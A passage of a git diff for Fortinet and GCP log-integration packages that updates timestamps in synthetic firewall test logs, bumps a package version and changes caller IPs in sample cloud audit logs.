rcvdbyte=1751 sentpkt=orum app=tation", "event": { - "ingested": "2021-06-29T09:33:01.618669800Z" + "ingested": "2021-12-09T13:37:31.907319300Z" }, "tags": [ "preserve_original_event" @@ -1074,7 +1074,7 @@ }, "message": "logver=repre date=2019-7-24 time=8:58:48 log_id=ore devid=ionemu devname=rehend logid=uiad type=tasu subtype=sciun level=high vd=taev srcip=10.196.124.206 srcport=7569 srcintf=enp0s2181 dstip=10.186.88.110 dstport=4203 dstintf=enp0s5497 poluuid=asnulapa sessionid=hende proto=0 action=deny policyid=ntmolli trandisp=uto duration=178.755000 sentbyte=6361 rcvdbyte=1742 devtype=ipsu osname=taedi osversion=1.2682 mastersrcmac=acom srcmac=01:00:5e:99:e3:a5 crscore=175.099000 craction=Cic crlevel=aturveli eventtype=lica user=Exc service=amvolup hostname=velill3821.mail.invalid profile=asnulap reqtype=usmodte url=https://example.com/loremag/mqu.gif?bore=lapari#aborios direction=external msg=lorem method=mnisiuta cat=quiadolo catdesc=abo device_id=msequine log_id=mrem pri=medium userfrom=atuserr adminprof=nsequatu timezone=ET main_type=uptasnu trigger_policy=atemUt sub_type=iurere severity_level=oident policy=volup src=10.97.254.192 src_port=302 dst=10.124.34.251 dst_port=3899 http_method=imide http_url=sequa http_host=ine http_agent=ollitan http_session_id=eacomm signature_subclass=onseq signature_id=6250 srccountry=reetd content_switch_name=equamnih server_pool_name=tevelite false_positive_mitigation=sitvolup user_name=epor monitor_status=atatnonp http_refer=https://example.org/elauda/ria.htm?uptatemU=iono#quun http_version=itationu dev_id=eniamqui threat_weight=adolo history_threat_weight=oreetdol threat_level=uinesciu ftp_mode=sciun ftp_cmd=tametc cipher_suite=rExcep msg_id=avolup", "event": { - "ingested": "2021-06-29T09:33:01.618676200Z" + "ingested": "2021-12-09T13:37:31.907324700Z" }, "tags": [ "preserve_original_event" @@ -1086,7 +1086,7 @@ }, "message": "logver=olores devname=\"ineavol\" devid=\"bori\" vd=taev date=2019-8-7 time=4:01:23 logid=ngelit type=uidexea subtype=stiaec level=very-high eventtime=quipex logtime=rsintoc srcip=10.9.41.221 srcport=4010 srcintf=eth434 srcintfrole=estlabor dstip=10.81.58.91 dstport=2247 dstintf=lo6072 dstintfrole=udexerci poluuid=onemul sessionid=elaud proto=tcp action=cancel policyid=trudexe policytype=tiumtota crscore=53.861000 craction=ariaturE crlevel=fug appcat=umqu service=umqu srccountry=roide dstcountry=tio trandisp=autem tranip=10.204.98.238 tranport=3885 duration=108.380000 sentbyte=2498 rcvdbyte=3936 sentpkt=aquioffi app=aliqui", "event": { - "ingested": "2021-06-29T09:33:01.618683400Z" + "ingested": "2021-12-09T13:37:31.907329700Z" }, "tags": [ "preserve_original_event" @@ -1098,7 +1098,7 @@ }, "message": "date=2019-8-21 time=11:03:57 devname=unti device_id=tena log_id=velits type=event subtype=oditautf pri=high desc=rmagni user=tiono userfrom=utemvele msg=taevi action=cancel adom=xplicabo4308.www.example session_id=tquo", "event": { - "ingested": "2021-06-29T09:33:01.618690500Z" + "ingested": "2021-12-09T13:37:31.907333Z" }, "tags": [ "preserve_original_event" @@ -1110,7 +1110,7 @@ }, "message": "logver=nrepr devname=\"uipex\" devid=\"alorumw\" vd=nibus date=2019-9-5 time=6:06:31 logid=eiusmo type=rci subtype=seosquir level=medium eventtime=ume logtime=ercitati srcip=10.35.84.125 srcport=341 srcintf=enp0s2388 srcintfrole=pernatu dstip=10.37.120.29 dstport=4170 dstintf=enp0s1127 dstintfrole=tasuntex poluuid=etura sessionid=taedi proto=udp action=accept policyid=quiacon policytype=udexerc crscore=66.169000 craction=undeomni crlevel=ritquiin appcat=taspern service=iadeser srccountry=nos dstcountry=mollita trandisp=eserun tranip=10.212.208.70 tranport=3237 duration=36.569000 sentbyte=5330 rcvdbyte=11 sentpkt=otamr app=eveli", "event": { - "ingested": "2021-06-29T09:33:01.618697600Z" + "ingested": "2021-12-09T13:37:31.907337300Z" }, "tags": [ "preserve_original_event" @@ -1122,7 +1122,7 @@ }, "message": "logver=temsequi devname=\"aturvel\" devid=\"elaudan\" vd=alorum date=2019-9-19 time=1:09:05 logid=olor type=inesc subtype=tlaborio level=high eventtime=equeporr logtime=seq srcip=10.143.65.84 srcport=2670 srcintf=enp0s5828 srcintfrole=ddoeiu dstip=10.199.201.26 dstport=3770 dstintf=eth4236 dstintfrole=ore poluuid=onse sessionid=abo proto=1 action=accept policyid=magnaa policytype=tateveli crscore=94.258000 craction=xplica crlevel=dex appcat=rsintocc service=iusmo srccountry=oquisqu dstcountry=ullamcor trandisp=remagn tranip=10.207.207.106 tranport=2048 duration=94.877000 sentbyte=6896 rcvdbyte=7419 sentpkt=tvolup app=ites", "event": { - "ingested": "2021-06-29T09:33:01.618704900Z" + "ingested": "2021-12-09T13:37:31.907342100Z" }, "tags": [ "preserve_original_event" @@ -1134,7 +1134,7 @@ }, "message": "logver=rExce dtime=2019-10-03 20:11:40.172538723 +0000 UTC devid=rittenby devname=gni vd=ritq date=2019-10-3 time=8:11:40 logid=lestiaec type=rissusci subtype=fdeFi level=high eventtime=ehende logtime=riatu srcip=10.204.27.48 srcport=5998 srcintf=lo7358 srcintfrole=emaperia dstip=10.163.236.253 dstport=7768 dstintf=enp0s2100 dstintfrole=sequatu poluuid=ugi sessionid=oditau proto=1 action=block policyid=mvele policytype=atae crscore=123.668000 craction=imips crlevel=admi appcat=ocons service=tiumdol srccountry=sunt dstcountry=rrorsi trandisp=remagna tranip=10.41.61.88 tranport=426 duration=82.943000 sentbyte=525 rcvdbyte=3702 sentpkt=dolor app=ips", "event": { - "ingested": "2021-06-29T09:33:01.618712200Z" + "ingested": "2021-12-09T13:37:31.907346800Z" }, "tags": [ "preserve_original_event" @@ -1146,7 +1146,7 @@ }, "message": "logver=ipitlab dtime=2019-10-18 03:14:14.432538723 +0000 UTC devid=ipsa devname=dents vd=erepreh date=2019-10-18 time=3:14:14 logid=amest type=dolore subtype=xer level=medium eventtime=onemul logtime=off srcip=10.246.81.164 srcport=3453 srcintf=lo3071 srcintfrole=ende dstip=10.185.44.26 dstport=3193 dstintf=lo7861 dstintfrole=tationul poluuid=tam sessionid=byCic proto=0 action=cancel policyid=cons policytype=serro crscore=5.473000 craction=uiac crlevel=aecatcu appcat=sed service=uisnostr srccountry=aquei dstcountry=ation trandisp=sumqu tranip=10.53.110.111 tranport=2549 duration=141.141000 sentbyte=5569 rcvdbyte=5239 sentpkt=entore app=uaturQ", "event": { - "ingested": "2021-06-29T09:33:01.618719400Z" + "ingested": "2021-12-09T13:37:31.907351Z" }, "tags": [ "preserve_original_event" @@ -1158,7 +1158,7 @@ }, "message": "logver=xpli date=2019-11-1 time=10:16:48 log_id=quae devid=totamre devname=lam logid=quamestq type=porai subtype=oinve level=medium vd=hender srcip=10.84.154.230 srcport=1335 srcintf=enp0s1127 dstip=10.212.63.179 dstport=6790 dstintf=eth1762 poluuid=eufugia sessionid=temqu proto=3 action=allow policyid=tvolup trandisp=lori duration=130.339000 sentbyte=4763 rcvdbyte=4334 devtype=rnatur osname=etdolo osversion=1.802 mastersrcmac=adipisci srcmac=01:00:5e:7b:68:0e crscore=36.122000 craction=culpaq crlevel=quis eventtype=lupt user=upt service=aboN hostname=cupida6106.www5.local profile=tdo reqtype=asperna url=https://api.example.com/aco/empo.jpg?iumdol=iusm#ido direction=unknown msg=peri method=aspernat cat=seq catdesc=olup device_id=uamqu log_id=veli pri=high userfrom=etco adminprof=nulap timezone=CT main_type=radip trigger_policy=tali sub_type=ntin severity_level=loreseos policy=ites src=10.109.172.90 src_port=2785 dst=10.146.77.206 dst_port=1554 http_method=amnihilm http_url=ipsamv http_host=proid http_agent=xcep http_session_id=udantium signature_subclass=sum signature_id=1723 srccountry=iaecon content_switch_name=euf server_pool_name=norume false_positive_mitigation=hilmo user_name=aquaeab monitor_status=eporr http_refer=https://www.example.com/metMalo/santiu.jpg?icon=enderit#roquisqu http_version=lapa dev_id=imadm threat_weight=giatquo history_threat_weight=oeiusm threat_level=oreeuf ftp_mode=iusmodt ftp_cmd=umwrit cipher_suite=atatn msg_id=uatD", "event": { - "ingested": "2021-06-29T09:33:01.618726700Z" + "ingested": "2021-12-09T13:37:31.907354700Z" }, "tags": [ "preserve_original_event" @@ -1170,7 +1170,7 @@ }, "message": "date=2019-11-15 time=5:19:22 devname=ptate device_id=Nemoe log_id=cupidat type=generic subtype=onsequ pri=high devid=nostr devname=umtotam logid=mqua type=emU subtype=gnido level=very-high vd=plicab srcip=10.8.161.226 srcport=3191 srcintf=eth5256 dstip=10.13.234.237 dstport=3760 dstintf=enp0s1149 poluuid=oeiusmo sessionid=nisi proto=6 action=allow policyid=lupt trandisp=tlaborio duration=18.804000 sentbyte=1061 rcvdbyte=6464 devtype=itan osname=iquidexe osversion=1.2314 mastersrcmac=fugia srcmac=01:00:5e:09:8f:0e crscore=5.320000 craction=onof crlevel=quam eventtype=rure user=ipis service=liqu hostname=unt2122.internal.local profile=orsitame reqtype=tassitas url=https://example.org/uidolor/turve.htm?temporai=uasiarch#ect direction=unknown msg=occae method=lpaqu cat=minimav catdesc=col device_id=riamea log_id=ern pri=low userfrom=odtempo adminprof=con timezone=CEST main_type=offici trigger_policy=uipexe sub_type=ium severity_level=quamqua policy=nsequatu src=10.38.18.72 src_port=3177 dst=10.202.250.141 dst_port=1824 http_method=volu http_url=quatDui http_host=stenat http_agent=liquip http_session_id=eiusmodt signature_subclass=dmi signature_id=4174 srccountry=ameaque content_switch_name=pitlabor server_pool_name=essequa false_positive_mitigation=ini user_name=maperia monitor_status=ovolup http_refer=https://mail.example.com/veniamq/uisno.htm?luptas=omm#eaquei http_version=iveli dev_id=lill threat_weight=voluptat history_threat_weight=aturveli threat_level=incidunt ftp_mode=tatnonp ftp_cmd=abi cipher_suite=nimave msg_id=atu", "event": { - "ingested": "2021-06-29T09:33:01.618734Z" + "ingested": "2021-12-09T13:37:31.907358500Z" }, "tags": [ "preserve_original_event" @@ -1182,7 +1182,7 @@ }, "message": "logver=siu date=2019-11-30 time=12:21:57 log_id=inrepr devid=cero devname=ita logid=xercitat type=meumfug subtype=umt level=very-high vd=laparia srcip=10.195.87.127 srcport=760 srcintf=lo3094 dstip=10.52.118.202 dstport=6556 dstintf=enp0s5751 poluuid=ectobe sessionid=rehender proto=udp action=block policyid=orinc trandisp=tcons duration=52.473000 sentbyte=7043 rcvdbyte=4714 devtype=suscipi osname=imipsam osversion=1.4674 mastersrcmac=hilm srcmac=01:00:5e:73:ca:c1 crscore=54.412000 craction=etd crlevel=erspici eventtype=tfug user=atatno service=sed hostname=luptat2613.internal.localhost profile=olupt reqtype=mipsum url=https://www.example.net/Maloru/lapariat.htm?tlabori=rehender#odtempo direction=inbound msg=alorum method=tmollit cat=bori catdesc=antium device_id=reetdo log_id=rchitec pri=medium userfrom=cipitlab adminprof=venia timezone=CT main_type=quid trigger_policy=mwrit sub_type=cid severity_level=lupt policy=adipisc src=10.182.124.88 src_port=116 dst=10.139.144.75 dst_port=5037 http_method=utodi http_url=isiutali http_host=oremeu http_agent=mquaerat http_session_id=conse signature_subclass=mestq signature_id=5535 srccountry=turQuisa content_switch_name=itasper server_pool_name=cidu false_positive_mitigation=ips user_name=modo monitor_status=ela http_refer=https://example.org/unti/niamqu.html?ris=veli#giatnu http_version=tanimide dev_id=ectetur threat_weight=umexer history_threat_weight=nim threat_level=nisiuta ftp_mode=cipitla ftp_cmd=ditautf cipher_suite=oluptasn msg_id=madmin", "event": { - "ingested": "2021-06-29T09:33:01.618741200Z" + "ingested": "2021-12-09T13:37:31.907361900Z" }, "tags": [ "preserve_original_event" @@ -1194,7 +1194,7 @@ }, "message": "date=2019-12-14 time=7:24:31 logver=imadm devid=stla devname=cab logid=orr type=olu subtype=quatDu level=low vd=siste srcip=10.151.47.249 srcport=6697 srcintf=lo5632 dstip=10.155.194.6 dstport=3005 dstintf=enp0s6106 poluuid=quatDu sessionid=deFinib proto=HOPOPT action=block policyid=taedic trandisp=ffi duration=130.219000 sentbyte=2693 rcvdbyte=568 devtype=consequ osname=rumw osversion=1.1386 mastersrcmac=temveleu srcmac=01:00:5e:df:96:27 crscore=104.315000 craction=item crlevel=remipsum eventtype=olupt user=usc service=ernat hostname=neavo4796.internal.domain profile=tatemac reqtype=exer url=https://www5.example.com/xea/ssecill.html?quianonn=quun#one direction=internal msg=riame method=uaUte cat=quae catdesc=utlabor device_id=ameius log_id=tate pri=very-high userfrom=lupta adminprof=atemseq timezone=CEST main_type=amcolab trigger_policy=ectobea sub_type=itsedq severity_level=pta policy=remipsu src=10.35.10.19 src_port=3941 dst=10.188.124.185 dst_port=5837 http_method=tali http_url=tasper http_host=amquisn http_agent=esciu http_session_id=iamea signature_subclass=perspi signature_id=7117 srccountry=emaccus content_switch_name=expl server_pool_name=giat false_positive_mitigation=uscipi user_name=dolo monitor_status=tionevol http_refer=https://internal.example.com/uptatema/dutpers.htm?tion=iumdol#ept http_version=Mal dev_id=tquasia threat_weight=ficiad history_threat_weight=roinBC threat_level=eufu ftp_mode=tio ftp_cmd=equatDu cipher_suite=exea msg_id=tasnulap", "event": { - "ingested": "2021-06-29T09:33:01.618748400Z" + "ingested": "2021-12-09T13:37:31.907366100Z" }, "tags": [ "preserve_original_event" diff --git a/packages/fortinet/manifest.yml b/packages/fortinet/manifest.yml index f352747ee1a..d4143322123 100644 --- a/packages/fortinet/manifest.yml +++ b/packages/fortinet/manifest.yml @@ -1,6 +1,6 @@ name: fortinet title: Fortinet Logs -version: 1.3.0 +version: 1.3.1 release: ga description: Collect logs from Fortinet instances with Elastic Agent. type: integration diff --git a/packages/gcp/_dev/deploy/docker/sample_logs/audit.log b/packages/gcp/_dev/deploy/docker/sample_logs/audit.log index 9c228890527..1d846e9557c 100644 --- a/packages/gcp/_dev/deploy/docker/sample_logs/audit.log +++ b/packages/gcp/_dev/deploy/docker/sample_logs/audit.log @@ -3,5 +3,5 @@ {"insertId":"yonau2dg2zi","logName":"projects/elastic-beats/logs/cloudaudit.googleapis.com%2Fdata_access","protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"xxx@xxx.xxx"},"authorizationInfo":[{"granted":true,"permission":"compute.instances.list","resourceAttributes":{"name":"projects/elastic-beats","service":"resourcemanager","type":"resourcemanager.projects"}}],"methodName":"beta.compute.instances.aggregatedList","numResponseItems":"61","request":{"@type":"type.googleapis.com/compute.instances.aggregatedList"},"requestMetadata":{"callerIp":"192.168.1.1","callerSuppliedUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0,gzip(gfe),gzip(gfe)","destinationAttributes":{},"requestAttributes":{"auth":{},"time":"2019-12-19T00:44:25.198Z"}},"response":{"@type":"core.k8s.io/v1.Status","apiVersion":"v1","details":{"group":"batch","kind":"jobs","name":"gsuite-exporter-1589294700","uid":"2beff34a-945f-11ea-bacf-42010a80007f"},"kind":"Status","metadata":{},"status":"Success"},"resourceLocation":{"currentLocations":["global"]},"resourceName":"projects/elastic-beats/global/instances","serviceName":"compute.googleapis.com"},"receiveTimestamp":"2019-12-19T00:44:25.262379373Z","resource":{"labels":{"location":"global","method":"compute.instances.aggregatedList","project_id":"elastic-beats","service":"compute.googleapis.com","version":"beta"},"type":"api"},"severity":"INFO","timestamp":"2019-12-19T00:44:25.051Z"} {"insertId":"yonau3dc2zi","logName":"projects/elastic-beats/logs/cloudaudit.googleapis.com%2Fdata_access","protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"xxx@xxx.xxx"},"authorizationInfo":[{"permission":"compute.instances.list","resourceAttributes":{"name":"projects/elastic-beats","service":"resourcemanager","type":"resourcemanager.projects"}}],"methodName":"beta.compute.instances.aggregatedList","numResponseItems":"61","request":{"@type":"type.googleapis.com/compute.instances.aggregatedList"},"requestMetadata":{"callerIp":"192.168.1.1","callerSuppliedUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0,gzip(gfe),gzip(gfe)","destinationAttributes":{},"requestAttributes":{"auth":{},"time":"2019-12-19T00:44:25.198Z"}},"resourceLocation":{"currentLocations":["global"]},"resourceName":"projects/elastic-beats/global/instances","serviceName":"compute.googleapis.com","status":{"code":7,"message":"PERMISSION_DENIED"}},"receiveTimestamp":"2019-12-19T00:44:25.262379373Z","resource":{"labels":{"location":"global","method":"compute.instances.aggregatedList","project_id":"elastic-beats","service":"compute.googleapis.com","version":"beta"},"type":"api"},"severity":"INFO","timestamp":"2019-12-19T00:44:25.051Z"} {"insertId":"87efd529-6349-45d2-b905-fc607e6c5d3b","labels":{"authorization.k8s.io/decision":"allow","authorization.k8s.io/reason":"RBAC: allowed by ClusterRoleBinding \"cert-manager-webhook:auth-delegator\" of ClusterRole \"system:auth-delegator\" to ServiceAccount \"cert-manager-webhook/cert-manager\""},"logName":"projects/foo/logs/cloudaudit.googleapis.com%2Fdata_access","operation":{"first":true,"id":"5555555-6349-45d2-b905-fc607e6c5d3b","last":true,"producer":"k8s.io"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"system:serviceaccount:cert-manager:cert-manager-webhook"},"authorizationInfo":[{"granted":true,"permission":"io.k8s.authorization.v1beta1.subjectaccessreviews.create","resource":"authorization.k8s.io/v1beta1/subjectaccessreviews"}],"methodName":"io.k8s.authorization.v1beta1.subjectaccessreviews.create","request":{"@type":"authorization.k8s.io/v1beta1.SubjectAccessReview","apiVersion":"authorization.k8s.io/v1beta1","kind":"SubjectAccessReview","metadata":{"creationTimestamp":null},"spec":{"group":["system:serviceaccounts","system:serviceaccounts:kube-system","system:authenticated"],"nonResourceAttributes":{"path":"/apis/webhook.cert-manager.io/v1beta1","verb":"get"},"user":"system:serviceaccount:kube-system:resourcequota-controller"},"status":{"allowed":false}},"requestMetadata":{"callerIp":"10.11.12.13","callerSuppliedUserAgent":"webhook/v0.0.0 (linux/amd64) kubernetes/$Format"},"resourceName":"authorization.k8s.io/v1beta1/subjectaccessreviews","response":{"@type":"authorization.k8s.io/v1beta1.SubjectAccessReview","apiVersion":"authorization.k8s.io/v1beta1","kind":"SubjectAccessReview","metadata":{"creationTimestamp":null},"spec":{"group":["system:serviceaccounts","system:serviceaccounts:kube-system","system:authenticated"],"nonResourceAttributes":{"path":"/apis/webhook.cert-manager.io/v1beta1","verb":"get"},"user":"system:serviceaccount:kube-system:resourcequota-controller"},"status":{"allowed":true,"reason":"RBAC: allowed by ClusterRoleBinding \"system:discovery\" of ClusterRole \"system:discovery\" to Group \"system:authenticated\""}},"serviceName":"k8s.io","status":{"code":0}},"receiveTimestamp":"2020-08-05T21:07:32.157698684Z","resource":{"labels":{"cluster_name":"analysis-cluster","location":"us-central1-a","project_id":"elastic-siem"},"type":"k8s_cluster"},"timestamp":"2020-08-05T21:07:30.974750Z"} -{"insertId":"v2spcwdzmc2","logName":"projects/foo/logs/cloudaudit.googleapis.com%2Factivity","operation":{"first":true,"id":"operation-1596664766354-5ac287c395484-fa3923bd-543e018e","producer":"compute.googleapis.com"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"user@mycompany.com"},"authorizationInfo":[{"granted":true,"permission":"compute.images.create","resourceAttributes":{"name":"projects/foo/global/images/windows-server-2016-v20200805","service":"compute","type":"compute.images"}}],"methodName":"v1.compute.images.insert","request":{"@type":"type.googleapis.com/compute.images.insert","family":"windows-server-2016","guestOsFeatures":[{"type":"VIRTIO_SCSI_MULTIQUEUE"},{"type":"WINDOWS"}],"name":"windows-server-2016-v20200805","rawDisk":{"source":"https://storage.googleapis.com/storage/v1/b/foo/o/windows-server-2016-v20200805.tar.gz"},"sourceType":"RAW"},"requestMetadata":{"callerIp":"1.2.3.4","callerSuppliedUserAgent":"google-cloud-sdk gcloud/290.0.1 command/gcloud.compute.images.create invocation-id/032752ad0fa44b4ea951951d2deef6a3 environment/None environment-version/None interactive/True from-script/False python/2.7.17 term/xterm-256color (Macintosh; Intel Mac OS X 19.6.0),gzip(gfe)","destinationAttributes":{},"requestAttributes":{"auth":{},"time":"2020-08-05T21:59:27.515Z"}},"resourceLocation":{"currentLocations":["eu"]},"resourceName":"projects/foo/global/images/windows-server-2016-v20200805","response":{"@type":"type.googleapis.com/operation","id":"44919313","insertTime":"2020-08-05T14:59:27.259-07:00","name":"operation-1596664766354-5ac287c395484-fa3923bd-543e018e","operationType":"insert","progress":"0","selfLink":"https://www.googleapis.com/compute/v1/projects/foo/global/operations/operation-1596664766354-5ac287c395484-fa3923bd-543e018e","selfLinkWithId":"https://www.googleapis.com/compute/v1/projects/foo/global/operations/4491931805423146320","startTime":"2020-08-05T14:59:27.274-07:00","status":"RUNNING","targetId":"12345","targetLink":"https://www.googleapis.com/compute/v1/projects/foo/global/images/windows-server-2016-v20200805","user":"user@mycompany.com"},"serviceName":"compute.googleapis.com"},"receiveTimestamp":"2020-08-05T21:59:27.822546978Z","resource":{"labels":{"image_id":"771879043","project_id":"foo"},"type":"gce_image"},"severity":"NOTICE","timestamp":"2020-08-05T21:59:26.456Z"} -{"insertId":"-c7ctxmd2zab","logName":"projects/foo/logs/cloudaudit.googleapis.com%2Factivity","operation":{"id":"operation-1596646123456-5ac2438b775f6-f8ca1382-e70b6831","last":true,"producer":"compute.googleapis.com"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"user@mycompany.com"},"methodName":"beta.compute.instances.stop","request":{"@type":"type.googleapis.com/compute.instances.stop"},"requestMetadata":{"callerIp":"2.3.4.5","callerSuppliedUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0,gzip(gfe),gzip(gfe)"},"resourceName":"projects/foo/zones/us-central1-a/instances/win10-test","serviceName":"compute.googleapis.com"},"receiveTimestamp":"2020-08-05T16:56:41.315135528Z","resource":{"labels":{"instance_id":"590261181","project_id":"foo","zone":"us-central1-a"},"type":"gce_instance"},"severity":"NOTICE","timestamp":"2020-08-05T16:56:40.428Z"} +{"insertId":"v2spcwdzmc2","logName":"projects/foo/logs/cloudaudit.googleapis.com%2Factivity","operation":{"first":true,"id":"operation-1596664766354-5ac287c395484-fa3923bd-543e018e","producer":"compute.googleapis.com"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"user@mycompany.com"},"authorizationInfo":[{"granted":true,"permission":"compute.images.create","resourceAttributes":{"name":"projects/foo/global/images/windows-server-2016-v20200805","service":"compute","type":"compute.images"}}],"methodName":"v1.compute.images.insert","request":{"@type":"type.googleapis.com/compute.images.insert","family":"windows-server-2016","guestOsFeatures":[{"type":"VIRTIO_SCSI_MULTIQUEUE"},{"type":"WINDOWS"}],"name":"windows-server-2016-v20200805","rawDisk":{"source":"https://storage.googleapis.com/storage/v1/b/foo/o/windows-server-2016-v20200805.tar.gz"},"sourceType":"RAW"},"requestMetadata":{"callerIp":"67.43.156.13","callerSuppliedUserAgent":"google-cloud-sdk gcloud/290.0.1 command/gcloud.compute.images.create invocation-id/032752ad0fa44b4ea951951d2deef6a3 environment/None environment-version/None interactive/True from-script/False python/2.7.17 term/xterm-256color (Macintosh; Intel Mac OS X 19.6.0),gzip(gfe)","destinationAttributes":{},"requestAttributes":{"auth":{},"time":"2020-08-05T21:59:27.515Z"}},"resourceLocation":{"currentLocations":["eu"]},"resourceName":"projects/foo/global/images/windows-server-2016-v20200805","response":{"@type":"type.googleapis.com/operation","id":"44919313","insertTime":"2020-08-05T14:59:27.259-07:00","name":"operation-1596664766354-5ac287c395484-fa3923bd-543e018e","operationType":"insert","progress":"0","selfLink":"https://www.googleapis.com/compute/v1/projects/foo/global/operations/operation-1596664766354-5ac287c395484-fa3923bd-543e018e","selfLinkWithId":"https://www.googleapis.com/compute/v1/projects/foo/global/operations/4491931805423146320","startTime":"2020-08-05T14:59:27.274-07:00","status":"RUNNING","targetId":"12345","targetLink":"https://www.googleapis.com/compute/v1/projects/foo/global/images/windows-server-2016-v20200805","user":"user@mycompany.com"},"serviceName":"compute.googleapis.com"},"receiveTimestamp":"2020-08-05T21:59:27.822546978Z","resource":{"labels":{"image_id":"771879043","project_id":"foo"},"type":"gce_image"},"severity":"NOTICE","timestamp":"2020-08-05T21:59:26.456Z"} +{"insertId":"-c7ctxmd2zab","logName":"projects/foo/logs/cloudaudit.googleapis.com%2Factivity","operation":{"id":"operation-1596646123456-5ac2438b775f6-f8ca1382-e70b6831","last":true,"producer":"compute.googleapis.com"},"protoPayload":{"@type":"type.googleapis.com/google.cloud.audit.AuditLog","authenticationInfo":{"principalEmail":"user@mycompany.com"},"methodName":"beta.compute.instances.stop","request":{"@type":"type.googleapis.com/compute.instances.stop"},"requestMetadata":{"callerIp":"67.43.156.13","callerSuppliedUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0,gzip(gfe),gzip(gfe)"},"resourceName":"projects/foo/zones/us-central1-a/instances/win10-test","serviceName":"compute.googleapis.com"},"receiveTimestamp":"2020-08-05T16:56:41.315135528Z","resource":{"labels":{"instance_id":"590261181","project_id":"foo","zone":"us-central1-a"},"type":"gce_instance"},"severity":"NOTICE","timestamp":"2020-08-05T16:56:40.428Z"} diff --git a/packages/gcp/_dev/deploy/docker/sample_logs/firewall.log b/packages/gcp/_dev/deploy/docker/sample_logs/firewall.log index 0843196acc5..7b3ab77e457 100644 --- a/packages/gcp/_dev/deploy/docker/sample_logs/firewall.log +++ b/packages/gcp/_dev/deploy/docker/sample_logs/firewall.log @@ -1,22 +1,22 @@ {"insertId":"1dobeotg13df9f5","jsonPayload":{"connection":{"dest_ip":"10.128.0.16","dest_port":80,"protocol":6,"src_ip":"10.142.0.10","src_port":57794},"disposition":"DENIED","instance":{"project_id":"local-test","region":"us-central1","vm_name":"local-adrian-test","zone":"us-central1-a"},"remote_instance":{"project_id":"remote-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_vpc":{"project_id":"remote-beats","subnetwork_name":"mysubnet","vpc_name":"default"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"mysubnet","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-06T16:41:45.009675991Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"12345667","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-06T16:41:38.394575419Z"} {"insertId":"1dobeotg13df9f7","jsonPayload":{"connection":{"dest_ip":"10.128.0.10","dest_port":57794,"protocol":6,"src_ip":"10.142.0.16","src_port":80},"disposition":"DENIED","instance":{"project_id":"local-test","region":"us-central1","vm_name":"local-adrian-test","zone":"us-central1-a"},"remote_instance":{"project_id":"remote-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_vpc":{"project_id":"remote-beats","subnetwork_name":"mysubnet","vpc_name":"default"},"rule_details":{"action":"DENY","direction":"EGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"mysubnet","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-06T16:41:45.009675991Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"892378332","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-06T16:41:38.394575419Z"} -{"insertId":"4zuj4nfn4llkb","jsonPayload":{"connection":{"dest_ip":"8.8.8.8","dest_port":53,"protocol":17,"src_ip":"10.128.0.16","src_port":60094},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:35:24.466374097Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:35:17.214711274Z"} 